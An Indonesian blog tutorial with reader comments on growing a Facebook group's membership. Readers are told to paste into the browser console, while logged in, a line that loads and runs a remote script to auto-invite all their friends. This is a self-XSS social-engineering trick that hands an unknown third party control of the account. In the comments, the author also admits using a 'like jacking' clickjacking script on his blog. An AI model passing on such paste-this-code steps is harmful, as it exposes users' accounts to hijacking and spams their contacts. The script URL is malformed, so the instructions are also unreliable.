Cara Mudah Memperbanyak Anggota/Members Grup di Facebook

Cara Mudah Memperbanyak Anggota/Members Grup di Facebook

script cepat menambah anggota facebook, trik cepat memperbanyak anggota grup facebook, auto invite anggota grup facebook, script auto invite members grup facebook

Cara memperbanyak anggota grup di facebook | tips menambah members grup di facebook | script cepat menambahkan anggota grup facebook - BlogRion - Sebenarnya saya bingung mau buat artikel untuk update di blogrion ini, nahhh langkah pertama yang saya lakukan adalah mencari inspirasi dengan browsing, ehhh ada yang menarik!, langsung share aja yaitu cara memperbanyak anggota grup di facebook. (Sekilas Info) Di artikel sebelumnya blogrion juga udah pernah share artikel bertemakan facebook tapi bukan grup facebook melainkan fan page facebook yaitu Cara Mendapatkan Banyak Like Update Status di Facebook, Bagaimana cara mengubah nama Halaman?, Cara Membuat Icon Like Facebook Saat Chattingan mungkin berguna untuk sobat sekalian.


Setelah saya coba trik memperbanyak members group facebook ternyata 100% berhasil iho! gag percaya? silahkan sobat langsung cek di grup saya yang telah saya jadikan kelinci percobaan script memperbanyak anggota grup facebook yaitu grup Cheater|™darkness™. sekarang percaya kan? nah truss bagaimana cara memperbanyak anggota grup facebook tanpa invite orang satu persatu??? nih caranya memperbanyak anggota grup facebook dengan mudah yaitu dengan menggunakan javascript, lebih lengkapnya simak tutorial memperbanyak anggota grup facebook dengan mudah di bawah ini :

Cara Mudah Mendapatkan Banyak Anggota Grup Facebook dengan Javascript


Cara Memperbanyak Anggota Grup Facebook via Browser Mozila Firefox

 

1. Login ke akun facebook
2. Masuk ke halaman grup facebook yang akan ditambahkan anggotanya
3. Kemudian tekan tombol :
Ctrl + Shift + K 
lalu akan muncul konsol facebook, seperti yang terlihat pada gambar dibawah ini :
 
cara cepat menambah member di grup facebook, cara mudah memperbanyak anggota grup di facebook
facebook console!

4. Kemudian anda copy kode script dibawah ini :
document.body.appendChild(document.createElement('script')).src='hhttp://scriptaif.googlecode.com/files/scriptaif.js';
5. Lalu paste-kan script tadi kedalam konsol facebook, untuk lebih jelasnya, silahkan lihat gambar dibawah ini :

cara memperbanyak anggota grup facebook, javascript menambah member grup di facebook, tips cepat memperbanyak anggota grup facebook
Paste-kan kode tadi disini!
6. Selanjutnya tekan "ENTER" dan tunggu hingga proses selesai :)


Cara Memperbanyak Anggota Grup Facebook via Google Chrome

1. Masuk ke akun facebook
2. Masuk ke halaman grup facebook yang ingin diperbanyak
3. Klik Kanan Mouse
4. Pilih Inspect Element and Console
5. Copy paste kode berikut kedalam jendela yang muncul :
document.body.appendChild(document.createElement('script')).src='hhttp://scriptaif.googlecode.com/files/scriptaif.js';
6. Kemudian tekan "ENTER" dan tunggu hingga proses menambahkan anggota grup di facebook selesai.
Penting!
 
Banyaknya anggota grup yang ter-invite tergantung seberapa banyak teman yang kita miliki di facebook


Sekiranya begitu tips facebook kali ini yaitu memperbanyak anggota grup facebook dengan javascript, jika ada yang belum paham bisa nanya di form komentar artikel Cara Mudah Memperbanyak Anggota/Members Grup di Facebook ini. Sekian artikel cara menambah members grup facebook, saya rion selaku penulis artikel cara memperbanyak anggota grup facebook berpesan agar menggunakan trik dan tips facebook kali ini dengan bijak, jika terjadi sesuatu yang tidak diinginkan dikarenakan penggunaan javascript tadi, kami pihak BlogRion sepenuhnya tidak bertanggung jawab atas semua itu !. Sampai disini Rion pamit dulu ya!!!
Artikel tentang Cara Mudah Memperbanyak Anggota/Members Grup di Facebook Rating: 5 Ditulis oleh: rionster
ItemReviewed: Cara Mudah Memperbanyak Anggota/Members Grup di Facebook

7 komentar :

  1. sob, gimana cara buat kursor yang ada tombol like nya seperti pada blogrion nich??

    BalasHapus
    Balasan
    1. oh itu saya pake script like jacking sob!

      saya pesan kalau pengen pakai tu script pertimbangkan dulu, karena pengunjung akan kesel ama kursornya karena ngeklik link ga bisa-bisa!

      ampe-ampe pengunjung di blogrion ini ngata-ngatain iho gara-gara script like jacking yang saya berikan di BlogRion!

      Hapus
    2. Emank sich sob, klik link tak bisa-bisa. BTW online pake apa sob??? Modem atau apa???

      Hapus
  2. cuma 95 ribu sob, saya cuma beli domain aja. Hosting saya masing numpang di blogger. dengan kata lain disebut Redirect URL.
    Saya beli di rumahweb.com

    Rionster.com masih available, beli lah sob sebelum di beli oleh orang lain. Keren tuch nama domain

    BalasHapus
  3. All mnta bantuannya knp akun saya d kira palsu ea..?

    BalasHapus
  4. sob.. kenapa.. belum bisa juga ya.. apa kah ada yang salah ya..
    caranya sudah dikuti semua.. namun belum berhasil tulisannya indefined

    BalasHapus
  5. makasih mas bro buat sharenya.. menarik sekali artikelnya
    agen tiket online
    jasa iklan massal

    BalasHapus

Silahkan berkomentar sesuai topik bahasan and no spam, no iklan, no ribut, no live link !

© 2014 BlogRion All Rights reserved. Template by Reggy Zian